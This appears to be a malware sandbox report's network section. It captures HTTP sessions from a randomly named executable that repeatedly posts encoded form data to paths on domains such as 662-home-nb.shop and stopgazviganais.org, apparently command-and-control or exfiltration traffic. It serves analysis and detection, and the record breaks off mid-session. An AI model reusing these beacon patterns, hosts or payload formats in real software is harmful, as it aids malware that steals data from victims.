                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 76 78 32 4e 2f 32 79 43 4f 51 76 56 33 4d 52 78 48 65 38 50 77 31 52 34 61 50 53 35 30 47 57 53 4f 52 6b 6d 59 4c 5a 6b 4c 6f 46 56 7a 45 74 5a 79 50 36 4c 5a 75 58 62 31 71 64 56 6d 5a 4b 64 37 62 49 38 76 51 36 73 73 79 74 54 54 6c 67 4e 2b 63 41 53 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            22192.168.2.450029199.59.243.227803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:30.428373098 CEST895OUTPOST /axh7/ HTTP/1.1
                                                                                                                            Host: www.662-home-nb.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.662-home-nb.shop
                                                                                                                            Referer: http://www.662-home-nb.shop/axh7/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 4c 58 69 79 43 65 38 52 61 31 61 34 2b 73 36 6c 4c 54 69 2b 2b 73 6d 68 50 67 66 4b 54 6e 38 53 33 7a 51 68 34 30 76 33 78 7a 33 38 71 34 56 75 5a 76 4b 57 4c 6c 4c 59 75 64 57 50 6c 65 61 6d 51 4b 6a 4a 2f 4a 2b 63 33 48 63 4a 5a 32 47 64 56 56 42 58 2f 4f 46 5a 42 76 6f 46 43 75 4a 71 64 43 36 6f 7a 6e 38 48 4d 34 54 6e 70 61 68 62 48 63 78 61 43 52 6d 76 5a 73 34 72 69 67 48 4b 51 6a 37 73 58 68 2b 44 69 6f 59 64 56 49 55 6a 4d 5a 65 43 4f 66 45 58 50 2b 53 65 36 30 4e 46 53 4f 62 49 48 74 7a 41 6c 2f 67 48 52 4c 56 4c 38 4b 69 57 33 6a 32 38 35 73 47 49 4f 4d 4c 78 65 55 45 71 79 51 51 5a 49 57 74 5a 49 31 6c 46 2f 32 32 61 43 54 51 3d
                                                                                                                            Data Ascii: 2BWDG=LXiyCe8Ra1a4+s6lLTi++smhPgfKTn8S3zQh40v3xz38q4VuZvKWLlLYudWPleamQKjJ/J+c3HcJZ2GdVVBX/OFZBvoFCuJqdC6ozn8HM4TnpahbHcxaCRmvZs4rigHKQj7sXh+DioYdVIUjMZeCOfEXP+Se60NFSObIHtzAl/gHRLVL8KiW3j285sGIOMLxeUEqyQQZIWtZI1lF/22aCTQ=
                                                                                                                            Oct 19, 2024 12:58:31.054749966 CEST1236INHTTP/1.1 200 OK
                                                                                                                            date: Sat, 19 Oct 2024 10:58:30 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1134
                                                                                                                            x-request-id: 999f9fc2-6b10-453b-9dfa-c4938ce814af
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==
                                                                                                                            set-cookie: parking_session=999f9fc2-6b10-453b-9dfa-c4938ce814af; expires=Sat, 19 Oct 2024 11:13:30 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 76 78 32 4e 2f 32 79 43 4f 51 76 56 33 4d 52 78 48 65 38 50 77 31 52 34 61 50 53 35 30 47 57 53 4f 52 6b 6d 59 4c 5a 6b 4c 6f 46 56 7a 45 74 5a 79 50 36 4c 5a 75 58 62 31 71 64 56 6d 5a 4b 64 37 62 49 38 76 51 36 73 73 79 74 54 54 6c 67 4e 2b 63 41 53 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                            Oct 19, 2024 12:58:31.054819107 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTk5ZjlmYzItNmIxMC00NTNiLTlkZmEtYzQ5MzhjZTgxNGFmIiwicGFnZV90aW1lIjoxNzI5MzM1NT


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            23192.168.2.450030199.59.243.227803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:32.979406118 CEST10977OUTPOST /axh7/ HTTP/1.1
                                                                                                                            Host: www.662-home-nb.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.662-home-nb.shop
                                                                                                                            Referer: http://www.662-home-nb.shop/axh7/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 4c 58 69 79 43 65 38 52 61 31 61 34 2b 73 36 6c 4c 54 69 2b 2b 73 6d 68 50 67 66 4b 54 6e 38 53 33 7a 51 68 34 30 76 33 78 7a 2f 38 71 4b 64 75 4c 63 53 57 4b 6c 4c 59 79 4e 57 4f 6c 65 61 2f 51 4c 4c 4e 2f 4a 7a 68 33 45 6b 4a 4c 45 69 64 42 33 70 58 78 4f 46 5a 5a 66 6f 45 66 2b 49 71 64 44 4b 73 7a 6e 4d 48 4d 34 54 6e 70 5a 70 62 41 4e 78 61 41 52 6d 6f 4a 38 34 6e 30 51 48 6d 51 69 65 5a 58 67 4c 32 6a 5a 6b 64 56 6f 6b 6a 50 71 6d 43 54 76 45 56 49 2b 53 47 36 30 4a 67 53 4f 47 6b 48 74 47 58 6c 39 38 48 54 65 30 4e 6e 4c 57 33 75 69 47 66 75 63 76 6a 57 50 76 6e 59 47 73 70 31 6a 63 37 51 48 31 6d 4b 79 77 53 76 33 2b 4f 52 54 36 71 52 49 45 2f 4c 4f 53 31 34 42 6b 34 4f 31 33 39 5a 72 32 4c 45 39 59 66 68 4f 35 6c 44 56 33 48 6d 55 50 46 44 37 57 59 38 37 58 7a 6b 78 73 79 4e 57 31 65 67 38 2f 75 2f 34 57 59 73 69 33 62 76 62 68 59 53 72 47 6d 4d 2b 65 30 4b 69 64 68 50 66 32 69 58 41 6e 79 32 64 69 36 5a 6e 36 6a 6b 77 49 49 7a 35 72 55 35 34 6b 42 34 63 2f 64 50 4a 39 31 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=LXiyCe8Ra1a4+s6lLTi++smhPgfKTn8S3zQh40v3xz/8qKduLcSWKlLYyNWOlea/QLLN/Jzh3EkJLEidB3pXxOFZZfoEf+IqdDKsznMHM4TnpZpbANxaARmoJ84n0QHmQieZXgL2jZkdVokjPqmCTvEVI+SG60JgSOGkHtGXl98HTe0NnLW3uiGfucvjWPvnYGsp1jc7QH1mKywSv3+ORT6qRIE/LOS14Bk4O139Zr2LE9YfhO5lDV3HmUPFD7WY87XzkxsyNW1eg8/u/4WYsi3bvbhYSrGmM+e0KidhPf2iXAny2di6Zn6jkwIIz5rU54kB4c/dPJ91nnzHcYlSoFVGzM3jVbVKW6JvoWPlHwYAPBJlJwwhRGY/KRHw5+5o7//zAKzCMkdiPthIy+I+HbRNh+4RG3+HC46wasKtLgjIURizNu5NNB4fz8xcHkkPvzTnCYp1rMY1Dq9Tij9taU6Iq0ZL5doTJQS7pdGycmRJKMTOS83dNfaBgUHGAEUMiguAdAZTeziu2hd4zZQ0FZefI7m/pbrga8Vgz+4q9jPYPB8S2DBCFAcz0ygSoWrXIm73uiSKpOtphmXr4zOLWhjwsRNVV0YjBCNec6rmq0B0rZKZYOakFzXGrXxCjZGLAvUoAwlcCe9WtnMaAG7cgy7+lu1rYdYAeXr2ezpGrk64cI1gW7JccyqH1iER7hoXroZp8WqLY7rQGJNMl25WST/iN1aY7ZtRKIPzSHk6SJEikjWwJFT4hmYqSSBFawC/BKcSkw6yI85L7jUMqWh9wtOwWFXu/7XPXLdkbwDN6BKNJQfKYAUn7+OAQ1sNPyOJEVFzL7KY3eG1x6o+hP0V2nXKy677zkVdsiOo5m57cHCoAvLH0TZ+65a3DtrqOHe8U99XJxuFteDD7gGb7Y/X98iggLHugIvNe8JWp3zrVR7nRy4ukAcqsFyTMeSnIJSMjbho1ZXAQ+DHSmpn+H83Yunamoy/r8A1IDNDr70TVDDLN0 [TRUNCATED]
                                                                                                                            Oct 19, 2024 12:58:33.656591892 CEST1236INHTTP/1.1 200 OK
                                                                                                                            date: Sat, 19 Oct 2024 10:58:33 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1134
                                                                                                                            x-request-id: a6b38ced-5ce2-4ec3-97a2-4b5d73484a00
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==
                                                                                                                            set-cookie: parking_session=a6b38ced-5ce2-4ec3-97a2-4b5d73484a00; expires=Sat, 19 Oct 2024 11:13:33 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 76 78 32 4e 2f 32 79 43 4f 51 76 56 33 4d 52 78 48 65 38 50 77 31 52 34 61 50 53 35 30 47 57 53 4f 52 6b 6d 59 4c 5a 6b 4c 6f 46 56 7a 45 74 5a 79 50 36 4c 5a 75 58 62 31 71 64 56 6d 5a 4b 64 37 62 49 38 76 51 36 73 73 79 74 54 54 6c 67 4e 2b 63 41 53 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                            Oct 19, 2024 12:58:33.656622887 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTZiMzhjZWQtNWNlMi00ZWMzLTk3YTItNGI1ZDczNDg0YTAwIiwicGFnZV90aW1lIjoxNzI5MzM1NT


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            24192.168.2.450031199.59.243.227803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:35.516201973 CEST599OUTGET /axh7/?2BWDG=GVKSBocRMS2FyqXHPjOj9+OrOzTrYXMr5CJl/TLorgfRhIZbevfCFnb7jtSuw/m1FqikvKjm63UqVHDKIE9/vbA5AM47cN5qZi+S7x4iOYPaiZ0KOepXdRg=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.662-home-nb.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:58:36.149228096 CEST1236INHTTP/1.1 200 OK
                                                                                                                            date: Sat, 19 Oct 2024 10:58:35 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1470
                                                                                                                            x-request-id: ad4b6f1c-a2f8-4c35-9ee3-b0989c10458c
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cqqngY63WrEuSE1lE3W5vFDJ3GZFuVrC4ja9FZiTv+6MNyJUCywvbTiqXkMcfVutoxFYuuSmB/y84brKDGPVPw==
                                                                                                                            set-cookie: parking_session=ad4b6f1c-a2f8-4c35-9ee3-b0989c10458c; expires=Sat, 19 Oct 2024 11:13:36 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 71 71 6e 67 59 36 33 57 72 45 75 53 45 31 6c 45 33 57 35 76 46 44 4a 33 47 5a 46 75 56 72 43 34 6a 61 39 46 5a 69 54 76 2b 36 4d 4e 79 4a 55 43 79 77 76 62 54 69 71 58 6b 4d 63 66 56 75 74 6f 78 46 59 75 75 53 6d 42 2f 79 38 34 62 72 4b 44 47 50 56 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cqqngY63WrEuSE1lE3W5vFDJ3GZFuVrC4ja9FZiTv+6MNyJUCywvbTiqXkMcfVutoxFYuuSmB/y84brKDGPVPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                            Oct 19, 2024 12:58:36.149247885 CEST923INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWQ0YjZmMWMtYTJmOC00YzM1LTllZTMtYjA5ODljMTA0NThjIiwicGFnZV90aW1lIjoxNzI5MzM1NT


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            25192.168.2.450032172.67.196.90803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:41.305579901 CEST884OUTPOST /9ect/ HTTP/1.1
                                                                                                                            Host: www.stopgazviganais.org
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.stopgazviganais.org
                                                                                                                            Referer: http://www.stopgazviganais.org/9ect/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 5a 39 44 35 72 33 4e 72 47 38 4d 4b 4f 2b 5a 63 37 32 67 2b 5a 2f 7a 71 41 6f 6d 59 76 74 6d 32 4b 44 79 44 32 47 5a 5a 4c 77 30 78 45 59 49 4f 66 50 53 6b 43 39 37 46 54 51 35 71 38 35 50 4b 44 4f 71 6d 70 2b 71 6f 70 46 45 34 70 67 77 33 72 76 4a 57 45 6f 2b 6f 32 36 73 63 52 46 35 71 47 73 64 4f 32 48 58 73 66 34 65 72 55 57 31 6c 66 78 6d 6c 6f 72 53 61 74 6a 46 39 43 52 4d 77 47 72 68 4e 45 4e 62 67 52 35 30 72 38 67 69 33 4b 58 38 50 6c 74 6c 4c 4d 4b 6a 45 7a 55 67 30 67 4d 44 44 37 70 71 42 55 38 70 6f 59 49 37 4a 77 36 49 71 38 72 2b 73 6e 75 30 70 69 46 77 62 76 41 3d 3d
                                                                                                                            Data Ascii: 2BWDG=Z9D5r3NrG8MKO+Zc72g+Z/zqAomYvtm2KDyD2GZZLw0xEYIOfPSkC97FTQ5q85PKDOqmp+qopFE4pgw3rvJWEo+o26scRF5qGsdO2HXsf4erUW1lfxmlorSatjF9CRMwGrhNENbgR50r8gi3KX8PltlLMKjEzUg0gMDD7pqBU8poYI7Jw6Iq8r+snu0piFwbvA==
                                                                                                                            Oct 19, 2024 12:58:41.958129883 CEST995INHTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:41 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Location: https://www.mothersalwaysright.com/9ect/
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3028TEBOD%2BfZa2PtU7SRgXovEwfDNtHlQckN7jxzU2T7iu9ydk5EZwJC8ADbDYk%2Fd2Tpa10uMfktujQjlqNwnyfb6PCoXFKOnfnxTkq6TcFFYJEUQBCLFlmijRbteKq30mNUL8u329E5hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d5041238b962e69-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=884&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Raw: 61 65 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2d 72 63 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                            Data Ascii: ae<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx-rc/1.25.3.2</center></body></html>
                                                                                                                            Oct 19, 2024 12:58:41.958148003 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            26192.168.2.450033172.67.196.90803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:43.851504087 CEST904OUTPOST /9ect/ HTTP/1.1
